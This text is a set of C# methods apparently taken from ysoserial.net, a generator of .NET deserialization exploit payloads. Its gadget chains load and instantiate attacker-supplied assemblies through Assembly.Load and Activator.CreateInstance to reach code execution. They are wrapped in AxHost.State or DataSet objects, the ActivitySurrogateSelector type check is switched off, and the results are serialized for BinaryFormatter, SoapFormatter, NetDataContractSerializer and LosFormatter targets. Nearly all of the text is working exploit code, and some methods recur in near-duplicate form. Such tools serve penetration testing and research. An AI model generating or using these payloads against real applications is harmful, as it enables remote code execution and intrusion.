public void GetObjectData(SerializationInfo info, StreamingContext context) { System.Diagnostics.Trace.WriteLine("In GetObjectData"); List <object> ls = GadgetChains(); // Wrap the object inside a DataSet. This is so we can use the custom // surrogate selector. Idiocy added and removed here. /* * info.SetType(typeof(System.Data.DataSet)); * info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary); * info.AddValue("DataSet.DataSetName", ""); * info.AddValue("DataSet.Namespace", ""); * info.AddValue("DataSet.Prefix", ""); * info.AddValue("DataSet.CaseSensitive", false); * info.AddValue("DataSet.LocaleLCID", 0x409); * info.AddValue("DataSet.EnforceConstraints", false); * info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null); * info.AddValue("DataSet.Tables.Count", 1); * BinaryFormatter fmt = new BinaryFormatter(); * MemoryStream stm = new MemoryStream(); * fmt.SurrogateSelector = new MySurrogateSelector(); * fmt.Serialize(stm, ls); * info.AddValue("DataSet.Tables_0", stm.ToArray()); * //*/ //* saving around 404 characters by using AxHost.State instead of DataSet // However, DataSet can apply to more applications // https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state // vs // https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset MemoryStream stm = new MemoryStream(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.SurrogateSelector = new MySurrogateSelector(); fmtLocal.Serialize(stm, ls); } else { BinaryFormatter fmt = new BinaryFormatter(); fmt.SurrogateSelector = new MySurrogateSelector(); fmt.Serialize(stm, ls); } info.SetType(typeof(System.Windows.Forms.AxHost.State)); info.AddValue("PropertyBagBinary", stm.ToArray()); //*/ }
public DataSetMarshal(object fakeTable, InputArgs inputArgs) { MemoryStream stm = new MemoryStream(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.Serialize(stm, fakeTable); } else { BinaryFormatter fmt = new BinaryFormatter(); fmt.Serialize(stm, fakeTable); } SetFakeTable(stm.ToArray()); }
public AxHostStateMarshal(object fakePropertyBagBinary, InputArgs inputArgs) { MemoryStream stm = new MemoryStream(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.Serialize(stm, fakePropertyBagBinary); } else { BinaryFormatter fmt = new BinaryFormatter(); fmt.Serialize(stm, fakePropertyBagBinary); } SetFakePropertyBagBinary(stm.ToArray()); }
public void GetObjectData(SerializationInfo info, StreamingContext context) { System.Diagnostics.Trace.WriteLine("In GetObjectData"); DesignerVerb verb = null; Hashtable ht = null; List <object> ls = null; //variant 2, old technique if (this.variant_number == 2) { // Build a chain to map a byte array to creating an instance of a class. // byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win! List <byte[]> data = new List <byte[]>(); data.Add(this.assemblyBytes); var e1 = data.Select(Assembly.Load); Func <Assembly, IEnumerable <Type> > map_type = (Func <Assembly, IEnumerable <Type> >)Delegate.CreateDelegate(typeof(Func <Assembly, IEnumerable <Type> >), typeof(Assembly).GetMethod("GetTypes")); var e2 = e1.SelectMany(map_type); var e3 = e2.Select(Activator.CreateInstance); // PagedDataSource maps an arbitrary IEnumerable to an ICollection PagedDataSource pds = new PagedDataSource() { DataSource = e3 }; // AggregateDictionary maps an arbitrary ICollection to an IDictionary // Class is internal so need to use reflection. IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds); // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked. verb = new DesignerVerb("", null); // Need to insert IDictionary using reflection. typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict); // Pre-load objects, this ensures they're fixed up before building the hash table. ls = new List <object>(); ls.Add(e1); ls.Add(e2); ls.Add(e3); ls.Add(pds); ls.Add(verb); ls.Add(dict); } //Default, use compatible mode. //Old technique contains a compiler-generated class [System.Core]System.Linq.Enumerable+<SelectManyIterator>d__[Compiler_Generated_Class_SEQ]`2, //the Compiler_Generated_Class_SEQ may NOT same in different version of .net framework. //For example, in .net framework 4.6 was 16,and 17 in .net framework 4.7. //New technique use [System.Core]System.Linq.Enumerable+WhereSelectEnumerableIterator`2 only to fix it. //It make compatible from v3.5 to lastest(needs to using v3.5 compiler, and may also need to call disable type check first if target runtime was v4.8+). //Execution chain: Assembly.Load(byte[]).GetTypes().GetEnumerator().{MoveNext(),get_Current()} -> Activator.CreateInstance() -> Win! else { byte[][] e1 = new byte[][] { assemblyBytes }; IEnumerable <Assembly> e2 = CreateWhereSelectEnumerableIterator <byte[], Assembly>(e1, null, Assembly.Load); IEnumerable <IEnumerable <Type> > e3 = CreateWhereSelectEnumerableIterator <Assembly, IEnumerable <Type> >(e2, null, (Func <Assembly, IEnumerable <Type> >)Delegate.CreateDelegate ( typeof(Func <Assembly, IEnumerable <Type> >), typeof(Assembly).GetMethod("GetTypes") ) ); IEnumerable <IEnumerator <Type> > e4 = CreateWhereSelectEnumerableIterator <IEnumerable <Type>, IEnumerator <Type> >(e3, null, (Func <IEnumerable <Type>, IEnumerator <Type> >)Delegate.CreateDelegate ( typeof(Func <IEnumerable <Type>, IEnumerator <Type> >), typeof(IEnumerable <Type>).GetMethod("GetEnumerator") ) ); //bool MoveNext(this) => Func<IEnumerator<Type>,bool> => predicate //Type get_Current(this) => Func<IEnumerator<Type>,Type> => selector // //WhereSelectEnumerableIterator`2.MoveNext => // if(predicate(IEnumerator<Type>)) {selector(IEnumerator<Type>);} => // IEnumerator<Type>.MoveNext();return IEnumerator<Type>.Current; IEnumerable <Type> e5 = CreateWhereSelectEnumerableIterator <IEnumerator <Type>, Type>(e4, (Func <IEnumerator <Type>, bool>)Delegate.CreateDelegate ( typeof(Func <IEnumerator <Type>, bool>), typeof(IEnumerator).GetMethod("MoveNext") ), (Func <IEnumerator <Type>, Type>)Delegate.CreateDelegate ( typeof(Func <IEnumerator <Type>, Type>), typeof(IEnumerator <Type>).GetProperty("Current").GetGetMethod() ) ); IEnumerable <object> end = CreateWhereSelectEnumerableIterator <Type, object>(e5, null, Activator.CreateInstance); // PagedDataSource maps an arbitrary IEnumerable to an ICollection PagedDataSource pds = new PagedDataSource() { DataSource = end }; // AggregateDictionary maps an arbitrary ICollection to an IDictionary // Class is internal so need to use reflection. IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds); // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked. verb = new DesignerVerb("", null); // Need to insert IDictionary using reflection. typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict); // Pre-load objects, this ensures they're fixed up before building the hash table. ls = new List <object>(); ls.Add(e1); ls.Add(e2); ls.Add(e3); ls.Add(e4); ls.Add(e5); ls.Add(end); ls.Add(pds); ls.Add(verb); ls.Add(dict); } ht = new Hashtable(); // Add two entries to table. /* * ht.Add(verb, "Hello"); * ht.Add("Dummy", "Hello2"); */ ht.Add(verb, ""); ht.Add("", ""); FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance); Array keys = (Array)fi_keys.GetValue(ht); FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance); for (int i = 0; i < keys.Length; ++i) { object bucket = keys.GetValue(i); object key = fi_key.GetValue(bucket); if (key is string) { fi_key.SetValue(bucket, verb); keys.SetValue(bucket, i); break; } } fi_keys.SetValue(ht, keys); ls.Add(ht); // Wrap the object inside a DataSet. This is so we can use the custom // surrogate selector. Idiocy added and removed here. /* * info.SetType(typeof(System.Data.DataSet)); * info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary); * info.AddValue("DataSet.DataSetName", ""); * info.AddValue("DataSet.Namespace", ""); * info.AddValue("DataSet.Prefix", ""); * info.AddValue("DataSet.CaseSensitive", false); * info.AddValue("DataSet.LocaleLCID", 0x409); * info.AddValue("DataSet.EnforceConstraints", false); * info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null); * info.AddValue("DataSet.Tables.Count", 1); * BinaryFormatter fmt = new BinaryFormatter(); * MemoryStream stm = new MemoryStream(); * fmt.SurrogateSelector = new MySurrogateSelector(); * fmt.Serialize(stm, ls); * info.AddValue("DataSet.Tables_0", stm.ToArray()); * //*/ //* saving around 404 characters by using AxHost.State instead of DataSet // However, DataSet can apply to more applications // https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state // vs // https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset MemoryStream stm = new MemoryStream(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.SurrogateSelector = new MySurrogateSelector(); fmtLocal.Serialize(stm, ls); } else { BinaryFormatter fmt = new BinaryFormatter(); fmt.SurrogateSelector = new MySurrogateSelector(); fmt.Serialize(stm, ls); } info.SetType(typeof(System.Windows.Forms.AxHost.State)); info.AddValue("PropertyBagBinary", stm.ToArray()); //*/ }
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs) { // Disable ActivitySurrogate type protections during generation ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true"); MemoryStream stream = new MemoryStream(); if (formatter.ToLower().Equals("binaryformatter")) { BinaryFormatter fmt = new BinaryFormatter(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.Serialize(stream, payloadObj); } else { fmt.Serialize(stream, payloadObj); } if (inputArgs.Test) { try { stream.Position = 0; fmt.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } /* * We don't actually need to use ObjectStateFormatter in ysoserial.net because it is the same as LosFormatter without MAC/keys * else if (formatter.ToLower().Equals("objectstateformatter")) * { * ObjectStateFormatter osf = new ObjectStateFormatter(); * osf.Serialize(stream, payloadObj); * if (inputArgs.Test) * { * try * { * stream.Position = 0; * osf.Deserialize(stream); * } * catch (Exception err) * { * Debugging.ShowErrors(inputArgs, err); * } * } * return stream.ToArray(); * } */ else if (formatter.ToLower().Equals("soapformatter")) { SoapFormatter sf = new SoapFormatter(); sf.Serialize(stream, payloadObj); if (inputArgs.Minify) { stream.Position = 0; if (inputArgs.UseSimpleType) { stream = XMLMinifier.Minify(stream, new String[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true); } else { stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true); } } if (inputArgs.Test) { try { stream.Position = 0; sf.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { NetDataContractSerializer ndcs = new NetDataContractSerializer(); ndcs.Serialize(stream, payloadObj); if (inputArgs.Minify) { stream.Position = 0; if (inputArgs.UseSimpleType) { stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, null, FormatterType.NetDataContractXML, true); } else { stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true); } } if (inputArgs.Test) { try { stream.Position = 0; ndcs.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else if (formatter.ToLower().Equals("losformatter")) { LosFormatter lf = new LosFormatter(); if (inputArgs.Minify) { stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj); } else { lf.Serialize(stream, payloadObj); } if (inputArgs.Test) { try { stream.Position = 0; lf.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else { throw new Exception("Formatter not supported"); } }
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs) { MemoryStream stream = new MemoryStream(); if (formatter.ToLower().Equals("binaryformatter")) { BinaryFormatter fmt = new BinaryFormatter(); if (inputArgs.Minify) { ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter(); fmtLocal.Serialize(stream, payloadObj); } else { fmt.Serialize(stream, payloadObj); } if (inputArgs.Test) { try { stream.Position = 0; if (serializationBinder != null) { fmt.Binder = serializationBinder; } fmt.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } /* * We don't actually need to use ObjectStateFormatter in ysoserial.net because it is the same as LosFormatter without MAC/keys * else if (formatter.ToLower().Equals("objectstateformatter")) * { * ObjectStateFormatter osf = new ObjectStateFormatter(); * osf.Serialize(stream, payloadObj); * if (inputArgs.Test) * { * try * { * stream.Position = 0; * osf.Deserialize(stream); * } * catch (Exception err) * { * Debugging.ShowErrors(inputArgs, err); * } * } * return stream.ToArray(); * } */ else if (formatter.ToLower().Equals("soapformatter")) { SoapFormatter sf = new SoapFormatter(); sf.Serialize(stream, payloadObj); if (inputArgs.Minify) { stream.Position = 0; if (inputArgs.UseSimpleType) { stream = XMLMinifier.Minify(stream, new String[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true); } else { stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true); } } if (inputArgs.Test) { try { stream.Position = 0; if (serializationBinder != null) { sf.Binder = serializationBinder; } sf.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { NetDataContractSerializer ndcs = new NetDataContractSerializer(); ndcs.Serialize(stream, payloadObj); if (inputArgs.Minify) { stream.Position = 0; if (inputArgs.UseSimpleType) { stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { @"\<Signature2[^\/]+<\/Signature2\>" }, FormatterType.NetDataContractXML, true); } else { stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true); } } if (inputArgs.Test) { try { stream.Position = 0; if (serializationBinder != null) { ndcs.Binder = serializationBinder; } ndcs.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else if (formatter.ToLower().Equals("losformatter")) { LosFormatter lf = new LosFormatter(); if (inputArgs.Minify) { stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj); } else { lf.Serialize(stream, payloadObj); } if (inputArgs.Test) { try { stream.Position = 0; lf.Deserialize(stream); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(stream.ToArray()); } else { throw new Exception("Formatter not supported"); } }